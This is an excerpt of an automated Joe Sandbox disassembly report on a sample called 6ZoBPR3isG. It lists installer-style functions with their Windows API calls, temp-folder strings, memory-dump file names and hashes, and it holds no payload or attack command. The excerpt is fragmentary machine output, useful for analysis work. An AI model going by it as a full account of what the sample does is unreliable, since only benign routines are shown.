SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
Opcode Fuzzy Hash: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8

Function 0040667C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,761336C0,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,761336C0,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,761336C0,004036EF,?,00000006,00000008,0000000A), ref: 00406706

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040667D, 00406682
*?|<>/":, xrefs: 004066CE

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-2982765560
Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD

Function 00402E8E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000), ref: 00402EA9
GetTickCount.KERNEL32 ref: 00402EC7
wsprintfW.USER32 ref: 00402EF5

Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B

CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
ShowWindow.USER32(00000000,00000005), ref: 00402F27

Part of subcall function 00402E72: MulDiv.KERNEL32(00000000,00000064,00000DFE), ref: 00402E87

Strings

... %d%%, xrefs: 00402EEF

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
Opcode Fuzzy Hash: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE

Function 00404D1A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
GetMessagePos.USER32 ref: 00404D3D
ScreenToClient.USER32(?,?), ref: 00404D57
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F

Strings

f, xrefs: 00404D6B

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4

Function 00402DF3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,?,000000FA,00000000), ref: 00402E11
wsprintfW.USER32 ref: 00402E45
SetWindowTextW.USER32(?,?), ref: 00402E55
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67

Strings

unpacking data: %d%%, xrefs: 00402E33, 00402E43
verifying installer: %d%%, xrefs: 00402E3A

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99

Function 73F92569 Relevance: 9.1, APIs: 6, Instructions: 109COMMON

Download Yara Rule

APIs

Part of subcall function 73F9121B: GlobalAlloc.KERNELBASE(00000040,?,73F9123B,?,73F912DF,00000019,73F911BE,-000000A0), ref: 73F91225

GlobalFree.KERNEL32(?), ref: 73F92657
GlobalFree.KERNEL32(00000000), ref: 73F9268C

Memory Dump Source

Source File: 00000000.00000002.1691129260.0000000073F91000.00000020.00000001.01000000.00000004.sdmp, Offset: 73F90000, based on PE: true

Associated: 00000000.00000002.1691075383.0000000073F90000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1691156863.0000000073F94000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1691207488.0000000073F96000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73f90000_6ZoBPR3isG.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: af98aca9c4231ae0c5fefd3b464772db0eb0a6c045886772139b10566ae07ba1
Instruction ID: 7e3221f879faf346e01ee459c7de96f89f86e142f2c212a0a7b07c357772c093
Opcode Fuzzy Hash: af98aca9c4231ae0c5fefd3b464772db0eb0a6c045886772139b10566ae07ba1
Instruction Fuzzy Hash: 3531FE3210410EEFF716AF54CCA4E2E7BBAFB853803260129F246D7674C731A814CB59

Function 004028AD Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
GlobalFree.KERNEL32(?), ref: 00402956
GlobalFree.KERNEL32(00000000), ref: 00402969
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: ad54be54d1b33f2c3e643305ac3600c2e6c22dcacd93b56e136af0bf18fa41fc
Instruction ID: fa73a2a76dd28b4b8719808dd60f9f08d060129827b0ffc87b4efdc8f5ae5e12
Opcode Fuzzy Hash: ad54be54d1b33f2c3e643305ac3600c2e6c22dcacd93b56e136af0bf18fa41fc
Instruction Fuzzy Hash: 3D21BFB1D00124BBCF116FA5DE48D9E7E79EF09364F10023AF9607A2E1CB794D418B98

Function 00404C0C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
wsprintfW.USER32 ref: 00404CB6
SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9

Strings

(7B, xrefs: 00404C9F
%u.%u%s%s, xrefs: 00404C97

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$(7B
API String ID: 3540041739-1320723960
Opcode ID: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
Opcode Fuzzy Hash: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8

Function 00402598 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69stringCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsz9A57.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsz9A57.tmp\System.dll,00000400,?,?,00000021), ref: 004025E8
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsz9A57.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsz9A57.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsz9A57.tmp\System.dll,00000400,?,?,00000021), ref: 004025F3

Strings

C:\Users\user\AppData\Local\Temp\nsz9A57.tmp, xrefs: 004025E1
C:\Users\user\AppData\Local\Temp\nsz9A57.tmp\System.dll, xrefs: 004025B3, 004025DA, 004025EE, 0040263A

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsz9A57.tmp$C:\Users\user\AppData\Local\Temp\nsz9A57.tmp\System.dll
API String ID: 3109718747-952112840
Opcode ID: 2504939cc2fa207c3b55af63f84819462ffbd17dbd09f8919900b39cf6f986df
Instruction ID: c13fbae436403556d6c48d38c5ac6db5007ae9437622b5a65b164b2cac9ab4a1
Opcode Fuzzy Hash: 2504939cc2fa207c3b55af63f84819462ffbd17dbd09f8919900b39cf6f986df
Instruction Fuzzy Hash: FB110B72A00301BADB106BB18E8999F7664AF44359F20443BF502F21D0D9FC89416B5E

Function 73F918D9 Relevance: 7.7, APIs: 5, Instructions: 194COMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(?), ref: 73F9193A
GlobalFree.KERNEL32(?), ref: 73F91ADA
GlobalFree.KERNEL32(?), ref: 73F91ADF

Memory Dump Source

Source File: 00000000.00000002.1691129260.0000000073F91000.00000020.00000001.01000000.00000004.sdmp, Offset: 73F90000, based on PE: true

Associated: 00000000.00000002.1691075383.0000000073F90000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1691156863.0000000073F94000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1691207488.0000000073F96000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73f90000_6ZoBPR3isG.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: 0ed9285418febdf2630cba6e0d5f89ba6d74cc88c3293561ea0a4fc02060f91f
Instruction ID: 7eb55a72fbfd73d821150279022e361195eb8b3ffe683ac36ba768deb61aef3c
Opcode Fuzzy Hash: 0ed9285418febdf2630cba6e0d5f89ba6d74cc88c3293561ea0a4fc02060f91f
Instruction Fuzzy Hash: AC511832E5095AEFFB229FA488407AD77FAEB443D0B05427AD407E3184D6709E81879D

Function 73F92394 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 73F924D6

Part of subcall function 73F9122C: lstrcpynW.KERNEL32(00000000,?,73F912DF,00000019,73F911BE,-000000A0), ref: 73F9123C

GlobalAlloc.KERNEL32(00000040), ref: 73F9245C
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 73F92477

Memory Dump Source

Source File: 00000000.00000002.1691129260.0000000073F91000.00000020.00000001.01000000.00000004.sdmp, Offset: 73F90000, based on PE: true

Associated: 00000000.00000002.1691075383.0000000073F90000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1691156863.0000000073F94000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1691207488.0000000073F96000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73f90000_6ZoBPR3isG.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID:
API String ID: 4216380887-0
Opcode ID: 8f7f8f957f0ec0533607fb074a2db11bdae9b8afe4d4744a4615bde8e6c0e0bc
Instruction ID: b449027932c067661f8cf8ce748cd314bb1aadf9f1fda6c6ca71e38dafc87b8a
Opcode Fuzzy Hash: 8f7f8f957f0ec0533607fb074a2db11bdae9b8afe4d4744a4615bde8e6c0e0bc
Instruction Fuzzy Hash: 1A418CB240430EEFF325EF25DC54F6A77F8EB48390B124929E44BC6591EB70A548CB69

Function 00401DB9 Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401DBC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
ReleaseDC.USER32(?,00000000), ref: 00401DEF
CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
Opcode Fuzzy Hash: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D

Function 73F9161D Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,73F921EC,?,00000808), ref: 73F91635
GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,73F921EC,?,00000808), ref: 73F9163C
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,73F921EC,?,00000808), ref: 73F91650
GetProcAddress.KERNEL32(73F921EC,00000000), ref: 73F91657
GlobalFree.KERNEL32(00000000), ref: 73F91660

Memory Dump Source

Source File: 00000000.00000002.1691129260.0000000073F91000.00000020.00000001.01000000.00000004.sdmp, Offset: 73F90000, based on PE: true

Associated: 00000000.00000002.1691075383.0000000073F90000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1691156863.0000000073F94000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1691207488.0000000073F96000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73f90000_6ZoBPR3isG.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: 2a27496a38acd3a13b8c6f93d8002ee7e161ef9d0e1288b96756767234c3e5e9
Instruction ID: 74168db8c895cf8de0f385ff9cacb394009d8b86a45d27f61fe9ff4f69a0b5e9
Opcode Fuzzy Hash: 2a27496a38acd3a13b8c6f93d8002ee7e161ef9d0e1288b96756767234c3e5e9
Instruction Fuzzy Hash: 6AF0F8732061387B963077A78C48DABBE9CDF9B2F5B220211F629E21B086614C01DBF1

Function 00401D5D Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D63
GetClientRect.USER32(00000000,?), ref: 00401D70
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
DeleteObject.GDI32(00000000), ref: 00401DAE

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
Opcode Fuzzy Hash: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38

Function 00401C1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7

Strings

!, xrefs: 00401C5B

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18

Function 00405CBD Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403492,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,761336C0,004036EF,?,00000006,00000008,0000000A), ref: 00405CC3
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403492,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,761336C0,004036EF,?,00000006,00000008,0000000A), ref: 00405CCD
lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405CDF

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405CBD

